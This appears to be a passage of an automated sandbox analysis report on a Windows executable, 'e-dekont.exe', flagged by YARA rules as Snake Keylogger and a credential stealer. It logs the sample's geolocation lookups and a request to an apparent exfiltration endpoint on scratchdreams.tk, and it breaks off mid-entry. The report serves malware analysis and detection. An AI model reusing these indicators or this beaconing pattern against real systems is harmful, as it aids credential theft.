                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449748158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:15.131479025 CEST151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:15.298448086 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449734104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:08 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:08 UTC695INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: MISS
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZZ%2Fsp4D3JME0r5KtWFwo7mhSbPqhWRcrz%2B%2FZGTOlRx7p07T4phsD2pZV6XXFKfUEjzfeoL4MjIQQUdNLj4tnbUSVrXhIuHtSi9UZgX44zaxggdIx2RX8NcS0u7lyBnwzn5BXwnK"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394582ea62adb-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:08 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449735104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:09 UTC62OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-04-24 05:09:09 UTC698INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:09 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 1
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JzMWq6142JWdoHOpmvjc6ZXQr7UXowxTSe3MPpVqpfUWroef1jqmO3HDaSfjP5aCOLFdarQvIq6Enq7dKqBsUgdNC%2Bw1u5fnItZ3krnS5eJHuEajT1IIe6Tfra2x3u92FRp82V3o"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793945f58f63235-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:09 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449738104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:10 UTC62OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-04-24 05:09:10 UTC704INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:10 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 2
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXK2qdlE6pLnwWIo0Dh7EKG5%2FrhxUvgXYWilcAhnlU%2FBzjmc%2BV%2BhXnrfKHS0MuzxF1upH32pe2ILq81gMdaOUt1AJSvgdgqPtFZmrbEv9t502qb35YXZzi4nFjXUXKiYVBC8RaVi"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87939465d9330faf-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:10 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449741104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:11 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:11 UTC704INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:11 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 3
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sB1w8rDjW4RyRB8jh9z6N9FnVVNTLdJGwK8O4ID2tqM%2BA2cAxnISYJWi41scyCnswAEm5zJzvSwYSUcv%2B%2FUE3a%2FosIOEZhuJvrG7aVTN8aGye4lSoLdF2Wg31gMEC4myWpQn0lr"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793946c5f9469bc-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:11 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449743104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:12 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:12 UTC698INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:12 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 4
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTCNb449sjEQMl6U92srMaMoT%2F3RWMtil6knwmf6gaLNdWSGsvCpbnJAl3O8krPL20TjFZ6dNRb3YE7uigEgtUvFC67UR6N4iQz2wHelLXG5R11t6fSDTHYzz0sqRkyFcyDeTh8f"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87939472df6edbd9-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:12 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449745104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:13 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:13 UTC704INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:13 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 5
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAUkryMT8M7TV3pRSXux3A0DTBVTT8xluUq0qTz9PTIGRzU8AdOwFOtkRL57T1ELNoZdONFSYrhRS3x4zvtvd2%2FiuZRNgm7v29E%2Fvq8%2B8x2h2OYWmVFUfBiECV1%2BwxjhEvujLFvo"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394795c0e2b5b-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:13 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449747104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:14 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:14 UTC712INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:14 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 6
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryjsHlHih0Yzm%2F%2Fot0dFn1bvfU6DT%2FQcXPDmlu6DJfT4V7v%2BeoQPFcHXgEpnozrpyUG72%2Bru%2FgDehJf4f1bmzPn1qDTnXVnVN3yzeMS3smjJBxEoVcv%2FoCZbk4JCYx7%2BCFo4vY3b"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793947fe9602ac7-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:14 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.449749104.21.67.1524437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:15 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:16 UTC704INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:15 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 7
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e%2BXvXiKExUCRvnQSD0MaZ%2BpggV19MtvCCCYVKUmnIQy9BgkOLur%2BsFq86%2FGfss6577uPqown2nLapAtKjNl7PqvM7MaxJKdgx2tXcNyM02xxRKJ5pRgvIQwtiobLdETUfgQ8Tpe"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394867d0c0fe0-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:16 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.449750104.21.27.854437424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 05:09:18 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                      Host: scratchdreams.tk
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:57 UTC737INHTTP/1.1 522
                                                      Date: Wed, 24 Apr 2024 05:09:57 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Content-Length: 15
                                                      Connection: close
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iL2Fj964QJoPtXX40kNuYCCMu6styWTSmwqm8uJmH89HvDF2Yl4FhGiX5CSpjujNwmVuTbxTDEwLEN0UpruCMHlrTQ3tPFH%2Fw2MITuw%2BXBZ28B63ImH1sjAh%2Bs%2BMCfatgGcT"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      X-Frame-Options: SAMEORIGIN
                                                      Referrer-Policy: same-origin
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Server: cloudflare
                                                      CF-RAY: 879394966dbf08ea-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:57 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                      Data Ascii: error code: 522


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:07:09:03
                                                      Start date:24/04/2024
                                                      Path:C:\Users\user\Desktop\e-dekont.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\e-dekont.exe"
                                                      Imagebase:0x700000
                                                      File size:854'528 bytes
                                                      MD5 hash:FF53D6A04EA8618890F7A81E31BD8A22
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:07:09:05
                                                      Start date:24/04/2024
                                                      Path:C:\Users\user\Desktop\e-dekont.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\e-dekont.exe"
